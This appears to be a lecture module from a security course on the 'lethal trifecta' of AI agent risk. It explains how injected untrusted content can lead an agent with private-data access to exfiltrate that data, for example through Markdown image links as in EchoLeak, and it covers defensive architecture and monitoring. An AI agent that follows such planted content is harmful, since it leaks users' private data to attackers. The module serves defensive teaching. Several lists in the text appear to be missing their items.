Module 3.6 — The Lethal Trifecta

50-minute lecture · Day 3 afternoon · Closes Day 3, lab follows

Learning objectives

By end of this module, students can:

  1. State the three legs of Simon Willison’s “lethal trifecta” — access to private data, exposure to untrusted content, ability to externally communicate
  2. Audit any LLM-touching system against the trifecta, identifying which legs it satisfies
  3. Apply at least three architectural patterns that break a leg of the trifecta, eliminating the class of vulnerability rather than just patching specific instances
  4. Use the trifecta lens to interpret recent incidents (EchoLeak, GTG-1002, the broader EchoLeak class) as instances of the same root cause

The framing

Simon Willison published “The lethal trifecta for AI agents: private data, untrusted content, and external communication” on June 16, 2025. The framing identifies a structural vulnerability pattern in AI agent design:

If your agent combines these three features — access to private data, exposure to untrusted content, and the ability to externally communicate — an attacker can easily trick it into accessing your private data and sending it to that attacker.

The three legs:

  1. Access to private data — Your emails, internal documents, databases, customer records, anything the LLM can read on your behalf. One of the most common purposes of tools in the first place — it’s why people deploy enterprise copilots.

  2. Exposure to untrusted content — Any mechanism by which text (or images, video, audio) controlled by a malicious attacker could become available to your LLM. A web page, an incoming email, a third-party document, a public Slack channel, a customer support ticket.

  3. Ability to externally communicate — Any path for the LLM to send data outward. Direct API calls. Sending emails. Rendering Markdown links or images (the EchoLeak exfil path). Posting to message queues. Updating a public dashboard.

The lethal property: when an agent simultaneously has all three, an attacker placing crafted content in the “untrusted content” surface can trick the agent into reading “private data” and sending it through the “external communication” channel — without the user ever knowing.

Source (canonical): simonwillison.net/2025/Jun/16/the-lethal-trifecta/


Why this framing matters

Detection engineering is often a long list of specific patterns: catch this jailbreak string, block this CVE, alert on that signature. The trifecta is architectural — it lets you reason about a class of vulnerabilities and design systems that don’t satisfy all three legs simultaneously.

The trifecta lens explains, in one frame:

The detection engineer’s value-add: instead of patching one vulnerability after another, audit your LLM-touching systems against the trifecta and decompose the ones that satisfy all three legs.


The trifecta audit pattern

For every LLM-touching system in your org, walk through the three legs:

SystemPrivate data access?Untrusted content exposure?External communication?All three?
M365 Copilot✓ Outlook, OneDrive, SharePoint✓ Inbound email content✓ Markdown links/images via Teams proxyYES — fix needed
Internal RAG chatbot (knowledge base only)✓ Internal KB? Depends on KB content provenance? Depends on action capabilitiesMaybe
Customer-facing support bot✓ Customer-specific data via session✓ Customer inputs✓ Returns responses to customerYES — fix needed
GitHub Copilot in dev IDE✓ Local code✓ Files opened in IDE✗ No external comms beyond Microsoft APINO — only two legs
Slack AI summarizing channel✓ Channel history✓ Any external user’s message✓ Posts summary back to channelYES — fix needed
Image-generation tool✗ No private data✓ User prompt✓ Generates imageNO — only two legs
Slackbot that auto-replies to mentions✓ Workspace content✓ Mentioner’s message✓ Replies in channelYES — fix needed

A system flagged with three checkmarks is a trifecta-positive system. Trifecta-positive systems are the priority list for the SOC’s defensive architecture review.

The exercise to run with students: have them map the trifecta against their own org’s LLM-touching systems. Most teams discover 3-5 trifecta-positive systems they hadn’t recognized as a coherent risk class.


Architectural patterns that break a leg

When a system is trifecta-positive, the goal is to break at least one leg so the class of vulnerability is eliminated. Three viable patterns:

Pattern 1: Break the External Communication leg

The most common viable decomposition. Run the agent in a sandboxed, network-isolated environment where all outbound traffic is disabled or strictly whitelisted to non-attacker-controllable destinations.

Examples:

Pattern 2: Break the Untrusted Content leg

Ensure the agent only sees content that has been verified-trusted before reaching the LLM’s context. Concretely:

Pattern 3: Break the Private Data Access leg

Reduce the agent’s read scope to the absolute minimum. The agent can’t exfiltrate what it can’t access.

Anthropic’s framing: the “Rule of Two”

A defensive heuristic increasingly cited in 2025-2026 enterprise-AI guidance: any AI agent should only satisfy a maximum of two legs of the trifecta. If an agent reads private data and processes untrusted content, it should not externally communicate. If an agent reads private data and externally communicates, it should not see untrusted content. Etc.

Instructor note: the “Rule of Two” formulation is increasingly common but verify the specific attribution and source-document before citing in delivery. The principle is widely held; the exact phrasing varies by vendor.


Recent incidents through the trifecta lens

EchoLeak (CVE-2025-32711, M365 Copilot)

The fix Microsoft shipped (June 2025): disrupted the Markdown-image-rendering exfiltration path — broke the External Communication leg for that specific channel. Trifecta-positive status reduced for that specific attack path. Broader trifecta-positive status remains for any future not-yet-discovered exfiltration channel — which is why the EchoLeak class is more important than the specific CVE.

GTG-1002 (Anthropic Nov 2025, Claude Code agent)

Anthropic’s response was to detect and disrupt specific operator accounts, not to architecturally decompose Claude Code. The vulnerability class remains — the next adversary will use different operator credentials and different role-play framing. The trifecta is unbroken.

CopilotHunter exposing thousands of bots (Bargury BHUSA 2024)

Bargury’s research found enterprise Copilot deployments exposed externally — bots with private-data access and external communication capability that anyone could send untrusted content to. Each exposed bot was a trifecta-positive system. The “fix” — restricting external access — broke the Untrusted Content leg for the population of attackers (general internet) and reduced it to specific authenticated users.


The detection engineer’s role

For trifecta-positive systems that cannot be architecturally decomposed (because the business value depends on the agent having all three properties), the SOC’s role is to:

  1. Layer detection across all three legs:
    • Pre-LLM screening for untrusted content (Module 3.4 detector + Module 3.5 guardrails)
    • Monitoring on private-data access patterns — alert on unusual scope, volume, or content categories
    • Egress monitoring on external communication — detect data-shaped outputs, unusual destinations
  2. Build canary tokens — high-entropy strings in the private-data store that should never appear in outputs. Any appearance = breach evidence.
  3. Output-side data classification — every LLM response is scanned for sensitive content markers before delivery; sensitive content in unexpected contexts triggers HITL
  4. Provenance tracking — every byte of content that influenced an LLM output is tagged with its source. After-the-fact investigation can trace exfiltration paths.

These controls don’t break a trifecta leg — they make exploitation noisy enough to detect. Detection is the fallback when architectural decomposition isn’t viable.


Discussion questions (~10 min)

  1. Run the trifecta audit against your org’s existing LLM-touching systems. Which systems are trifecta-positive? For each, which leg is most economically viable to break? Which would require business approval to decompose?
  2. EchoLeak was fixed by breaking the Markdown-image-rendering exfiltration path. Is that the same as breaking the External Communication leg? What other communication channels remain? Is the M365 Copilot deployment still trifecta-positive?
  3. The “Rule of Two” heuristic says any AI agent should satisfy at most two legs. Your CISO objects: “but agents that can read data, act on the world, and process external input is the whole point — that’s the use case.” How do you frame the trade-off?

Common mistakes

MistakeBetter approach
Patching specific vulnerabilities without addressing the architectureThe trifecta lens explains why specific patches don’t generalize — class-of-vulnerability thinking
Auditing only the “top-tier” LLM deploymentsSlack AI, internal Teams plugins, low-code agent builders often trip the trifecta without being on the SOC’s radar
Assuming “internal only” means trusted contentInternal content sources can still ingest untrusted content (user-submitted tickets, document uploads, third-party API responses)
Treating External Communication as “obviously needed”Many LLM use cases don’t actually require external communication; assess before assuming
Stopping at one architectural fixIf the system is trifecta-positive, address all three legs across detection + architecture

Closing Day 3

Day 3 has covered:

The architectural insight running through Day 3: the enterprise’s LLM-touching systems are themselves an attack surface. The trust boundary is no longer at the network perimeter — it’s inside the application, where untrusted content gets processed by privileged LLMs. The detection engineer’s controls must operate at that boundary.

Day 4 takes this further into agentic adversaries — the GTG-1002 class of attack — and AI supply-chain compromise. Day 5 is the capstone where students defend Verdancy Health against a multi-stage AI-orchestrated attack that includes EchoLeak-class prompt injection in Stage 3.